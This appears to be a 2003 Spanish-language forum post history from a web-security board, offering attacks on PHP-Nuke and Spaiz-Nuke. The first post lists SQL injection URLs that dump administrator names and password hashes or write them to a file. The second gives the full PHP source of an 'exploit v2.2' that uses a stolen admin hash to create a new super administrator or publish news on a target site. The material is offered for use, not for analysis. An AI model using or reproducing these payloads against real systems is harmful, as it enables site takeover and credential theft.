| |
 Mostrar Mensajes
|
|
Páginas: [1]
|
|
2
|
Seguridad Informática / Nivel Web / Aclaraciones:
|
en: 30 Octubre 2003, 15:35 pm
|
|
Aclaremos:
/admin.php?op=login&pwd=123&aid=Admin'%20INTO%20OUTFILE%20'/path_to_file/pwd.txt<=- Esto es para Unicamente el spaiz-nuke...
Que despues se visualiza en: /path_to_file/pwd.txt...
Para el PHP-Nuke y el Modulo WebLinks:
Para que muestre todos los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20
Y para que muestre los Password Codificados de los administradores:
/modules.php?name=Web_Links&l_op=viewlink&cid=2%20UNION%20select%20counter,%20pwd,%20aid%20FROM%20nuke_authors%20
Y sobre el PHP-Nuke y el modulo Downloads:
Con esto muestra los administradores y sus passwords codificados...:
/modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20....
Todo codigo que ejecuta la Inyeccion SQL puede ser modificado levemente para conseguir el objetivo deseado...
El exploit facilita el proceso, evitando que el usuario tenga que completar varias partes del proceso completo...
Salu2...
PD: Usar con moderacion y todo eso...
|
|
|
|
|
3
|
Seguridad Informática / Nivel Web / Nueva Version Exploit PHP-Nuke...
|
en: 16 Octubre 2003, 19:50 pm
|
Buenas  , gracias, queria publicaros la ultima version del exploit(v2.2), facilita otro apartado de la administracion, que permite agregar noticias... Ya no habrán mas por el tiempo etc... Aqui va el codigo: file: exploit.php <?php
/* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2
By
BBBBBBBB lll aaaaaaaa ddddddd eeeeeeeee
BBBBBBBBB lll aaaaaaaaa ddddddddde eeeeeeeee
BBBBBBBBBB lll aaaaaaaaad ddddddddde eeeeeeeeee
BBB lll aad de
BBB lll aaaaaaaaaad dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaad ddd dde eeeeeeeeee
BBBBBBBBBB lll aaaaaaaaaa ddd ddeeeeeeeeeeee
BBBBBBBBBB lll aaa aaa ddd dddeeee
BBB BBB lll aaa aaa ddd ddd eee
BBB BBBB lll aaa aaa ddd ddd eee
BBBBBBBBB lllllllaaa dddddddddd eeeeeeeeee
BBBBBBBBB llllllaaa ddddddddddd eeeeeeeee
BBBBBBBB lllll aa dddddddddd eeeeeee
<blade@abez.org>
|Blade «blade@abez.org»|
****www.abez.org Of AbeZ
***www.rzw.com.ar By XyborG
**www.adictosnet.com.ar By LaKosa
*www.fihezine.tsx.to Of FiH eZine
*/
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head>
<title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By Blade</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"><STYLE type=text/css>
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
A:link { COLOR: #000066; TEXT-DECORATION: none }
A:visited { COLOR: #000066; TEXT-DECORATION: none }
A:active { COLOR: #000066; TEXT-DECORATION: none }
A:hover { COLOR: #000066; TEXT-DECORATION: none }
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY: Verdana,Arial,Helvetica,sans-serif }
</STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636" vlink="#363636" alink="#d5ae83">
<!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code By Blade<blade@abez.org> -->';
if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email) and ($add_aid) and ($add_pwd)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='add' method='post' action='http://" . $server . "/admin.php'>
<input type='hidden' name='op' value='AddAuthor'>
<input type='hidden' name='add_name' value='" . $add_name . "'>
<input type='hidden' name='add_aid' value='" . $add_aid . "'>
<input type='hidden' name='add_email' value='" . $add_email . "'>
<input type='hidden' name='add_url' value='" . $add_url . "'>
<input type='hidden' name='add_pwd' value='" . $add_pwd . "'>
<input type='hidden' name='add_radminsuper' value='" . $add_radminsuper . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center><font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong> . <br>Clave Hash : <strong>" .
$hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name . "</strong>.
En caso de que estos datos no sean correctos vuelva atras desde
<a href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font>
<br><br><font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
continue la operacion agregando el nuevo Administrador.</b></font></center>
<center><input name='AddSysop' type='submit' id='AddSysop' value='Agregar Administrador' class='button'></center>
</form>";
} elseif (($action == "goNews") and ($server) and ($subject) and ($hometext) and ($bodytext)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash . ":";
$hash = base64_encode($hash);
echo "<form name='addNews' method='post' action='http://" . $server . "/admin.php'>
<input name='op' type='hidden' id='op' value='PostAdminStory'>
<input name='topic' type='hidden' id='topic' value='1'>
<input name='catid' type='hidden' id='catid' value='0'>
<input name='ihome' type='hidden' id='ihome' value='0'>
<input type='hidden' name='subject' value='" . $subject . "'>
<input type='hidden' name='hometext' value='" . $hometext . "'>
<input type='hidden' name='bodytext' value='" . $bodytext . "'>
<input type='hidden' name='acomm' value='" . $acomm . "'>
<input type='hidden' name='automated' value='" . $automated . "'>
<input type='hidden' name='day' value='" . $day . "'>
<input type='hidden' name='month' value='" . $month . "'>
<input type='hidden' name='year' value='" . $year . "'>
<input type='hidden' name='hour' value='" . $hour . "'>
<input type='hidden' name='min' value='" . $min . "'>
<input type='hidden' name='admin' value=" . $hash .">
<center>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor vulnerable
: <strong>http://" . $server . "</strong> . <br>
Clave Hash : <strong>" . $hash . "</strong> . <br>
Asunto de la Noticia: <strong>" . $subject . "</strong>. <br>
La Noticia es: <strong>" . $hometext . "</strong>. <br>
En caso de que estos datos no sean correctos vuelva atras desde <a href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font>
<br>
<br>
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si son correctos
continue la operacion agregando la noticia.</b></font>
</center>
<center>
<input name='AddSysop' type='submit' id='AddSysop' value='Agregar Noticia' class='button'>
</center>
</form>";
} elseif($exploit == "news") {
echo'<FORM action="' . $PHP_Self . '" method=post>
<TABLE width="50%" border=0 align="center" cellPadding=0 cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Servidor
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR>
<TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
Servidor:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server" value="www.">
</div></TD>
</TR>
<TR>
<TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
Admin :</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_name" type="text" id="admin_name" class="bginput">
</p></TD>
</TR>
<TR>
<TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40" class="bginput">
</p></TD>
</TR>
</TABLE><br>
<table width="50%" border="0" align="center">
<tr>
<td><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Noticia:</u></font></strong></div></td>
</tr>
<tr>
<td><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goNews">
Título</font></strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">(Obligatorio)<strong>:<br>
<input
size=50 name=subject class="bginput">
</strong></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Texto
de la Noticia</strong>(Obligatorio)<strong>:<br>
<textarea name=hometext rows=5 wrap=virtual cols=50 class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Texto
Extendido</strong>(Obligatorio)<strong>:<br>
<textarea name=bodytext rows=12 wrap=virtual cols=50 class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">¿Activar
Comentarios para esta Noticia?<strong>
<input type=radio checked
value=0 name=acomm>
Si
<input type=radio value=1
name=acomm>
No</strong><strong></strong></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">¿Quieres
programar esta historia?<strong>
<input type=radio value=1
name=automated>
Si
<input type=radio checked
value=0 name=automated>
No<br>
<br>
Día:
<input name="day" type="text" id="day3" value="' . date(d) . '" size="4" class="bginput">
Mes:
<select name="month" id="select2" class="bginput">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12" selected>12</option>
</select>
Año:
<input maxlength=4 size=5 value="' . date(Y) . '" name=year class="bginput">
<br>
Hora:
<select name=hour class="bginput">
<option selected name="hour">00</option>
<option name="hour">01</option>
<option name="hour">02</option>
<option name="hour">03</option>
<option name="hour">04</option>
<option name="hour">05</option>
<option name="hour">06</option>
<option name="hour">07</option>
<option name="hour">08</option>
<option name="hour">09</option>
<option name="hour">10</option>
<option name="hour">11</option>
<option name="hour">12</option>
<option name="hour">13</option>
<option name="hour">14</option>
<option name="hour">15</option>
<option name="hour">16</option>
<option name="hour">17</option>
<option name="hour">18</option>
<option name="hour">19</option>
<option name="hour">20</option>
<option name="hour">21</option>
<option name="hour">22</option>
<option name="hour">23</option>
</select>
:
<select name=min class="bginput">
<option
selected name="min">00</option>
<option name="min">05</option>
<option name="min">10</option>
<option name="min">15</option>
<option name="min">20</option>
<option name="min">25</option>
<option name="min">30</option>
<option name="min">35</option>
<option name="min">40</option>
<option name="min">45</option>
<option name="min">50</option>
<option name="min">55</option>
</select>
: 00</strong></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>
<input name="submit" type=submit value="Agregar Noticia" class="button">
</strong></font></div></td>
</tr>
</table><center><strong><font color="#000066" size="1" face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ Ver el exploit de los Administradores ]</a> </font></strong></center>';
} else {
echo'<FORM action="' . $PHP_Self . '" method=post>
<p align="center"><u><strong><font size="2" face="Verdana, Arial, Helvetica, sans-serif">
<input name="action" type="hidden" id="action" value="goAdmin">
</font></strong></u></p>
<div align="center">
<TABLE width="50%" border=0 align="center" cellPadding=0 cellSpacing=0>
<TR><TD colspan="3"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Servidor
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR>
<TD width="39%"> <div align="center"><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Direccion
Servidor:</strong></font></div></TD>
<TD width="13%"><div align="right"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">http://</font></div></TD>
<TD width="48%"><div align="left"><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text" class="bginput" id="server" value="www.">
</div></TD>
</TR>
<TR>
<TD> <div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Nombre
Admin :</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_name" type="text" id="admin_name" class="bginput">
</p></TD>
</TR>
<TR>
<TD><div align="center"><strong><font size="1" face="Verdana, Arial, Helvetica, sans-serif">Password
MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text" id="admin_hash" size="40" class="bginput">
</p></TD>
</TR>
</TABLE>
<br>
</div>
<TABLE width="50%" border=0 align="center">
<TBODY>
<TR>
<TD colspan="2"><div align="center"><strong><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Datos
de la Cuenta:</u></font></strong></div></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nombre:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=50 size=30 name=add_name class="bginput">
(Obligatorio)</font></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Nickname:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
(Obligatorio)</font></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>E-Mail:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT maxLength=60 size=30 name=add_email class="bginput">
(Obligatorio)</font></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">URL:</font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT name=add_url class="bginput" value="http://www." size=30 maxLength=60>
<strong>
<input name="add_radminsuper" type="hidden" id="add_radminsuper" value="1">
</strong> </font></TD>
</TR>
<TR>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong>Password:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">
(Obligatorio)</font></TD>
</TR>
<INPUT type=hidden value=AddAuthor name=op>
</TABLE>
<div align="center">
<INPUT name="submit" type=submit value="Crear Administrador" class="button">
</div>
</FORM><center><strong><font color="#000066" size="1" face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ Ver el exploit de la Noticias ]</a> </font></strong></center>';
} if (($action == "goAdmin") or ($action == "goNews")){
echo'';
}if (($action != "goAdmin") and ($action != "goNews")){
echo'<br><table width="100%" border="0" align="center">
<tr>
<td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Uso:</u></strong></font></div></td>
</tr>
<tr>
<td width="15%"><strong><font size="1" face="Tahoma">»Direccion Servidor
:</font></strong></td>
<td width="85%"><font size="1" face="Tahoma">Es la URL correspondiente al
Portal vulnerable en PHP-Nuke. Ejemplo: www.phpnuke.org.</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Tahoma">»Nombre Admin :</font></strong></td>
<td><font size="1" face="Tahoma">Es la identidad en valor de nombre, del administrador
del cual se conoce el password cifrado. Ejemplo : xMan.</font></td>
</tr>
<tr>
<td><strong><font size="1" face="Tahoma">»Password MD5 :</font></strong></td>
<td><font size="1" face="Tahoma">Es el password cifrado en MD5 del administrador,
cuyo nombre se conoce. Ejemplo: 1ea52f26e7e0ce08e462f87f5e35096c </font></td>
</tr>
</table><br><div align="center">
<table width="45%" border="0" align="center">
<tr>
<td colspan="2"><div align="center"><font color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-serif"><strong><u>Referencias:</u></strong></font></div></td>
</tr>
<tr>
<td width="47%"><div align="center"><font size="1" face="Tahoma">Descubridores
Bug :</font></div></td>
<td width="53%"><div align="center"><font size="1" face="Tahoma"><a href="http://rst.void.ru/texts/advisory10.htm" target="_blank">http://www.rst.void.ru</a>
</font> <font size="1" face="Tahoma"></font></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Tahoma"><strong>Mas Informacion</strong>
:</font></div></td>
<td><div align="center"><strong><font size="1" face="Tahoma"><a href="http://www.rzw.com.ar/article895.html" target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>
</tr>
<tr>
<td><div align="center"><font size="1" face="Tahoma">Mas Informacion :</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a href="http://www.security.nnov.ru/search/document.asp?docid=5201" target="_blank">http://www.security.nnov.ru</a></font></div></td>
</tr>
<tr>
<td>
<div align="center"><font size="1" face="Tahoma">Mas Informacion :</font></div></td>
<td><div align="center"><font size="1" face="Tahoma"><a href="http://www.cyruxnet.com.ar/phpnuke_modules.htm" target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>
</tr>
</table>';
}
echo'<center><p><a href="mailto:blade@abez.org"><u><strong><font color="#CC0000" size="1" face="Tahoma">Original Exploit Code By Blade.</font></strong></u></a><br><font color="#003366" size="1" face="Verdana"><b>Version 2.2.</b></font></p></center>
</div>
</body>
</html>';
?> Venga un saludo |
|
|
|
|
|
| |
|
